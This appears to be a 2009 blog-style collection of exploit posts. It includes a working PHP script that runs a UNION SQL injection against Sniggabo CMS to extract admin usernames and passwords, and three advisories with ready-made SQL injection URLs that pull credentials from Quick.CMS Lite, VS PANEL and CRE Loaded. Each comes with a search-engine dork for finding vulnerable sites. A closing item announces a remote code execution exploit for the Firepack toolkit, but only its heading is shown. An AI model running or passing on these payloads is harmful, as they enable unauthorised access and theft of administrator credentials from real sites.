This time only a small exploit:
<?php
print_r('
################################################
Sniggabo CMS - Remote SQL Injection Exploit
Date: 11.06.2009
Vulnerability discovered by: Lidloses_Auge
Exploit coded by: Lidloses_Auge
Homepage: http://www.novusec.com
Greetz to: -=Player=- , Suicide, enco,
Palme, GPM, karamble, Free-Hack
Admin Panel: [target]/admin/login.php
Dork: "powered by Sniggabo CMS" inurl:article.php?id
Use: php '.$argv[0].' http://www.site.com
################################################
');
$url = "$argv[1]/article.php?Id=null+union+select+concat(0x313a3a,userid,0x3a3a,password,0x3a3a)+from+users--";
$src = file_get_contents($url);
$data = split("::",$src);
echo "Admin: $data[1]\nPassword: $data[2]\n";
?>
# milw0rm.com [2009-06-11]
Lidloses_Auge Exploits, SQL Injections
The email to str0ke went out today (21.04.09 – 17:10).
[+]————————————-[+]
[+] Homepage: http://opensolution.org/
[+] Product: Quick.CMS Lite 0.5
[+] File: index.php
[+] Parameter: id
[+] Dork: “Powered by Quick.Cms”
[+]————————————-[+]
[+] SQL Injection:
[+] index.php?t=ph&id=null'+union+select+
[+] unhex(hex(concat_ws(0x203a20,id,litera,haslo,0x3c62723e3c62723e)))
[+] +from+sennik--+
[+]————————————-[+]
[+] Discovered by -=Player=-
[+] http://NovuSec.com
[+] http://Free-Hack.com
[+]————————————-[+]
[+] Greetz to :
[+] Lidloses_Auge, Suicide, enco, J0hn.X3r, Dexx, 2called-chaos, xant0x
[+]————————————-[+]
Player Exploits, SQL Injections
The email to str0ke went out today (21.04.09 – 16:30).
[+]————————————-[+]
[+] Homepage: http://www.vspanel.gr/
[+] Product: VS PANEL v.7.3.6
[+] File: showcat.php
[+] Parameter: Cat_ID
[+] Dork: “Powered by VS PANEL”
[+]————————————-[+]
[+] SQL Injection:
[+] showcat.php?Cat_ID=null+union+select+1,concat_ws(0x203a20,name,password)+from+Users--
[+]————————————-[+]
[+] Discovered by -=Player=-
[+] http://NovuSec.com
[+] http://Free-Hack.com
[+]————————————-[+]
[+] Greetz to :
[+] Lidloses_Auge, Suicide, enco, J0hn.X3r, Dexx, 2called-chaos, xant0x
[+]————————————-[+]
Player Exploits, SQL Injections
The email to str0ke went out today (21.04.09 – 14:30).
[+]————————————-[+]
[+] Homepage : http://www.creloaded.com/
[+] Product : CRE Loaded v6.2
[+] File : product_info.php
[+] Parameter : product_id
[+]————————————-[+]
[+] SQL Injection:
[+] product_info.php?products_id=-1+union+select+1,concat_ws(0x203a20,admin_email_address,admin_password)+from+admin--
[+]————————————-[+]
[+] Discovered by -=Player=-
[+] http://NovuSec.com
[+] http://Free-Hack.com
[+]————————————-[+]
[+] Greetz to :
[+] Lidloses_Auge, Suicide, enco, J0hn.X3r, Dexx, 2called-chaos, xant0x
[+]————————————-[+]
Player Exploits
Firepack – remote code/command execution exploit
I called it “hack the hacker”: my ironic plan was to exploit a toolkit that was itself coded for exploiting.
I had thought about it for a while, and then I took the next toolkit I could find and had a look through it.
The result was a remote code/command execution, which was very easy to find, but the coder didn’t notice it.
There is a lot more material that can be used in a similar way, but first of all the exploit:
URL of exploit
Lidloses_Auge Exploits, SQL Injections